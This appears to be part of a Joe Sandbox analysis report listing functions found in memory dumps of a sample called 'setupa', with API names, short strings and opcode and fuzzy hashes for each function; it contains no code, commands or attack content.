                                                                                                              Function 00007FF689647D83 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 61windowCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2203109760.00007FF689641000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF689640000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2203090868.00007FF689640000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203109760.00007FF689652000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203109760.00007FF689743000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203109760.00007FF68974A000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203305645.00007FF68974C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203377522.00007FF689790000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203398565.00007FF689792000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203419693.00007FF689795000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203442361.00007FF689799000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203442361.00007FF6897A8000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203493937.00007FF6897AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203493937.00007FF6897E4000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_7ff689640000_setupa.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: ErrorFormatFreeLastLocalMessage
                                                                                                              • String ID: FormatMessageA failed:
                                                                                                              • API String ID: 1365068426-3941490816
                                                                                                              • Opcode ID: caa1e78a362334a67372e0ec718cdaeb409f4e6dd051dd7dd82c4ccbca9a7b66
                                                                                                              • Instruction ID: b3b0ebe3a4b27425ef75a223f4279a7e283321640b028769bb6c2218d1e426a0
                                                                                                              • Opcode Fuzzy Hash: caa1e78a362334a67372e0ec718cdaeb409f4e6dd051dd7dd82c4ccbca9a7b66
                                                                                                              • Instruction Fuzzy Hash: 62215E32608A82C6EA209F15F8907EAA361FF85F95F504239DA4D83B99DF3CD545CB04
                                                                                                              Function 00007FF6896410F0 Relevance: 5.2, Strings: 4, Instructions: 245COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2203109760.00007FF689641000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF689640000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2203090868.00007FF689640000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203109760.00007FF689652000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203109760.00007FF689743000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203109760.00007FF68974A000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203305645.00007FF68974C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203377522.00007FF689790000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203398565.00007FF689792000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203419693.00007FF689795000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203442361.00007FF689799000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203442361.00007FF6897A8000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203493937.00007FF6897AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203493937.00007FF6897E4000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_7ff689640000_setupa.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: 0$0$0$0123456789abcdefABCDEF
                                                                                                              • API String ID: 0-4215698122
                                                                                                              • Opcode ID: 5544af9403bf587e77242deb49054958b10a808bcde7bc6a4a821a76ce6cef9a
                                                                                                              • Instruction ID: d9da0104bcde00ebe346d3f7268e9b863a1cd8670ad770a4b1548ca32a63af04
                                                                                                              • Opcode Fuzzy Hash: 5544af9403bf587e77242deb49054958b10a808bcde7bc6a4a821a76ce6cef9a
                                                                                                              • Instruction Fuzzy Hash: B8910622E0C29686F7268F14951037E7B90FF44F4AF485039DE9E87686DE3DE992D740
                                                                                                              Function 00007FF68964230B Relevance: 3.4, Strings: 2, Instructions: 899COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2203109760.00007FF689641000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF689640000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2203090868.00007FF689640000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203109760.00007FF689652000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203109760.00007FF689743000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203109760.00007FF68974A000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203305645.00007FF68974C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203377522.00007FF689790000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203398565.00007FF689792000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203419693.00007FF689795000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203442361.00007FF689799000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203442361.00007FF6897A8000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203493937.00007FF6897AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203493937.00007FF6897E4000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_7ff689640000_setupa.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: $0123456789-
                                                                                                              • API String ID: 0-700845222
                                                                                                              • Opcode ID: f0b8a4b0e297fea37151a888e5c2176794506fad7d2201413f79211c11c9d547
                                                                                                              • Instruction ID: aeb1ae219e08ef6c57cf1dba33125a49b4b2d132aff4afd083ab13672af684f3
                                                                                                              • Opcode Fuzzy Hash: f0b8a4b0e297fea37151a888e5c2176794506fad7d2201413f79211c11c9d547
                                                                                                              • Instruction Fuzzy Hash: 5982C112B58692C5FB689F6194601BD27A1FF46F85F85443AEE4EA7A85CF3CE4C0E700
                                                                                                              Function 00007FF689642176 Relevance: 2.1, APIs: 1, Instructions: 591COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2203109760.00007FF689641000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF689640000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2203090868.00007FF689640000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203109760.00007FF689652000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203109760.00007FF689743000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203109760.00007FF68974A000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203305645.00007FF68974C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203377522.00007FF689790000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203398565.00007FF689792000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203419693.00007FF689795000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203442361.00007FF689799000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203442361.00007FF6897A8000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203493937.00007FF6897AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203493937.00007FF6897E4000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_7ff689640000_setupa.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID:
                                                                                                              • API String ID:
                                                                                                              • Opcode ID: a8b3939bd2e0131e1b57a818494b36dc5fd9899e703216a391c1a5cd6750c71f
                                                                                                              • Instruction ID: e3b5bc90c7edab491b5dab795b776af555b3b3b3c123bbe6247a7d51e98090be
                                                                                                              • Opcode Fuzzy Hash: a8b3939bd2e0131e1b57a818494b36dc5fd9899e703216a391c1a5cd6750c71f
                                                                                                              • Instruction Fuzzy Hash: 01C15221A18682C2FB749FB69531BBA6291FF85FC5F54403AEE4E83A85DF3CD541DA00
                                                                                                              Function 00007FF68964277A Relevance: 2.0, Strings: 1, Instructions: 726COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2203109760.00007FF689641000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF689640000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2203090868.00007FF689640000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203109760.00007FF689652000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203109760.00007FF689743000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203109760.00007FF68974A000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203305645.00007FF68974C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203377522.00007FF689790000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203398565.00007FF689792000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203419693.00007FF689795000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203442361.00007FF689799000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203442361.00007FF6897A8000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203493937.00007FF6897AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203493937.00007FF6897E4000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_7ff689640000_setupa.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: 0123456789ABCDEFabcdef-+XxPp
                                                                                                              • API String ID: 0-3606100449
                                                                                                              • Opcode ID: cb5706aa228daea54bcbdb8f13c69cbf849a43265d83209aff444b9e8fd6f06f
                                                                                                              • Instruction ID: fbf94929df1c66b3354e63d850ce23ec25181e2e80c332d4d3f0995a9991ddc5
                                                                                                              • Opcode Fuzzy Hash: cb5706aa228daea54bcbdb8f13c69cbf849a43265d83209aff444b9e8fd6f06f
                                                                                                              • Instruction Fuzzy Hash: 4E52B511F0C682E5FB74DF62906017D27A0FF51F85F558A39DA8E82A85EE2CE4C2E701
                                                                                                              Function 00007FF689644953 Relevance: 2.0, Strings: 1, Instructions: 711COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2203109760.00007FF689641000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF689640000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2203090868.00007FF689640000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203109760.00007FF689652000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203109760.00007FF689743000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203109760.00007FF68974A000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203305645.00007FF68974C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203377522.00007FF689790000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203398565.00007FF689792000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203419693.00007FF689795000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203442361.00007FF689799000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203442361.00007FF6897A8000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203493937.00007FF6897AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203493937.00007FF6897E4000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_7ff689640000_setupa.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: 0123456789-+Ee
                                                                                                              • API String ID: 0-1347306980
                                                                                                              • Opcode ID: 23511fe1a65e298a515fb938c9677606ae9a48fbf5f73832e5be6d8772d04bdd
                                                                                                              • Instruction ID: 7cab7ae5527d50b1aa53e0198559fc67e3ef18cc8204433369d4dd00f54d8784
                                                                                                              • Opcode Fuzzy Hash: 23511fe1a65e298a515fb938c9677606ae9a48fbf5f73832e5be6d8772d04bdd
                                                                                                              • Instruction Fuzzy Hash: CE52A512A0C692E6FB70DF6594602BD6BB0BF51F86F445239DA4E82B85DE3CE4D1E700
                                                                                                              Function 00007FF689645894 Relevance: 1.8, APIs: 1, Instructions: 340COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2203109760.00007FF689641000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF689640000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2203090868.00007FF689640000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203109760.00007FF689652000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203109760.00007FF689743000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203109760.00007FF68974A000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203305645.00007FF68974C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203377522.00007FF689790000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203398565.00007FF689792000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203419693.00007FF689795000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203442361.00007FF689799000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203442361.00007FF6897A8000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203493937.00007FF6897AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203493937.00007FF6897E4000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_7ff689640000_setupa.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Info
                                                                                                              • String ID:
                                                                                                              • API String ID: 1807457897-0
                                                                                                              • Opcode ID: d941c51955f3ac6ef43d583640d27ac7d18357d72a66ffac39c08030b6b559b5
                                                                                                              • Instruction ID: 6dbfd4627a5595340c5e5865efaa82e08f2210c46d37cf570a3a078c54b7f6e4
                                                                                                              • Opcode Fuzzy Hash: d941c51955f3ac6ef43d583640d27ac7d18357d72a66ffac39c08030b6b559b5
                                                                                                              • Instruction Fuzzy Hash: 39029E62A08BC1C6E761CF2894552F973A4FB99B88F459239DF8D83652EF38E5C1C700
                                                                                                              Function 00007FF689731AA4 Relevance: 1.6, APIs: 1, Instructions: 61COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2203109760.00007FF689652000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF689640000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2203090868.00007FF689640000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203109760.00007FF689641000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203109760.00007FF689743000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203109760.00007FF68974A000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203305645.00007FF68974C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203377522.00007FF689790000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203398565.00007FF689792000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203419693.00007FF689795000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203442361.00007FF689799000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203442361.00007FF6897A8000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203493937.00007FF6897AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203493937.00007FF6897E4000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_7ff689640000_setupa.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: EnumLocalesSystem
                                                                                                              • String ID:
                                                                                                              • API String ID: 2099609381-0
                                                                                                              • Opcode ID: 45f11759097a8c12ddf40c1a2130a0cdebd219534fdbe1bfca9c82a44c0d2ba5
                                                                                                              • Instruction ID: 2c219e0738e2f7390e9ca0503dff6040cd9e05a887c09d0eb6d71ff6a8297819
                                                                                                              • Opcode Fuzzy Hash: 45f11759097a8c12ddf40c1a2130a0cdebd219534fdbe1bfca9c82a44c0d2ba5
                                                                                                              • Instruction Fuzzy Hash: 6311D263A18645CAEB148F25D4406A877A1FF90FE2F84813AC669833C0EE38D5D1D740
                                                                                                              Function 00007FF689731BA4 Relevance: 1.5, APIs: 1, Instructions: 42COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2203109760.00007FF689652000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF689640000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2203090868.00007FF689640000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203109760.00007FF689641000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203109760.00007FF689743000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203109760.00007FF68974A000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203305645.00007FF68974C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203377522.00007FF689790000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203398565.00007FF689792000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203419693.00007FF689795000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203442361.00007FF689799000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203442361.00007FF6897A8000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203493937.00007FF6897AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203493937.00007FF6897E4000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_7ff689640000_setupa.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: EnumLocalesSystem
                                                                                                              • String ID:
                                                                                                              • API String ID: 2099609381-0
                                                                                                              • Opcode ID: ede480e1ee975d1e52820b364c914ade96d73c13f1b5827d3ac1942b556d57ab
                                                                                                              • Instruction ID: 6a2ce7e663b347f56fe93cadf49945a3d54151c2f6509f708738a23badad06ec
                                                                                                              • Opcode Fuzzy Hash: ede480e1ee975d1e52820b364c914ade96d73c13f1b5827d3ac1942b556d57ab
                                                                                                              • Instruction Fuzzy Hash: BC018072B08242C6E7504F36E4407A977D5FF40FA6F859239D668872C4EF68D490E700
                                                                                                              Function 00007FF68964430E Relevance: 1.5, Strings: 1, Instructions: 224COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2203109760.00007FF689641000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF689640000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2203090868.00007FF689640000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203109760.00007FF689652000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203109760.00007FF689743000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203109760.00007FF68974A000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203305645.00007FF68974C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203377522.00007FF689790000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203398565.00007FF689792000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203419693.00007FF689795000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203442361.00007FF689799000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203442361.00007FF6897A8000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203493937.00007FF6897AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203493937.00007FF6897E4000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_7ff689640000_setupa.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: 0
                                                                                                              • API String ID: 0-4108050209
                                                                                                              • Opcode ID: 190e3d512df1446c8023d55ed37741515a139dc364b2ec3f40d8cc7a0650ff8c
                                                                                                              • Instruction ID: 462210c6d01205317fa5ad5f86f6620780b0b0e4c8fc3da2b3f039304ed9abe9
                                                                                                              • Opcode Fuzzy Hash: 190e3d512df1446c8023d55ed37741515a139dc364b2ec3f40d8cc7a0650ff8c
                                                                                                              • Instruction Fuzzy Hash: 5281C121A18242C6FBB89E2580506BE2390FF41FA6F14153ADD0FD7695CF2EF886D751
                                                                                                              Function 00007FF689647C75 Relevance: 1.5, Strings: 1, Instructions: 224COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2203109760.00007FF689641000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF689640000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2203090868.00007FF689640000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203109760.00007FF689652000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203109760.00007FF689743000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203109760.00007FF68974A000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203305645.00007FF68974C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203377522.00007FF689790000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203398565.00007FF689792000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203419693.00007FF689795000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203442361.00007FF689799000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203442361.00007FF6897A8000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203493937.00007FF6897AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203493937.00007FF6897E4000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_0_2_7ff689640000_setupa.jbxd
                                                                                                              Similarity
                                                                                                              • API ID:
                                                                                                              • String ID: 0
                                                                                                              • API String ID: 0-4108050209
                                                                                                              • Opcode ID: c343a4f4fbd0b90894a0db973e5c2f78bbf69234ffd0ee42e5b9127cb83201a8
                                                                                                              • Instruction ID: ccd025c494300adc067eda3e40804ead84edf2f8bc50e0863b09d20fbe01e889
                                                                                                              • Opcode Fuzzy Hash: c343a4f4fbd0b90894a0db973e5c2f78bbf69234ffd0ee42e5b9127cb83201a8
                                                                                                              • Instruction Fuzzy Hash: 1081D026B1C242C6FBA88E65904067D2290BF42FA6F14153EDD0FD7695CF3EE886D700
                                                                                                              Function 00007FF6896434B8 Relevance: 1.5, Strings: 1, Instructions: 220COMMON
                                                                                                              Download Yara Rule
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000000.00000002.2203109760.00007FF689641000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF689640000, based on PE: true
                                                                                                              • Associated: 00000000.00000002.2203090868.00007FF689640000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203109760.00007FF689652000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203109760.00007FF689743000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203109760.00007FF68974A000.00000020.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203305645.00007FF68974C000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203377522.00007FF689790000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203398565.00007FF689792000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203419693.00007FF689795000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203442361.00007FF689799000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203442361.00007FF6897A8000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                                                                                              • Associated: 00000000.00000002.2203493937.00007FF6897AC000.00000002.00000001.01000000.0000000A.sdmpDownload File
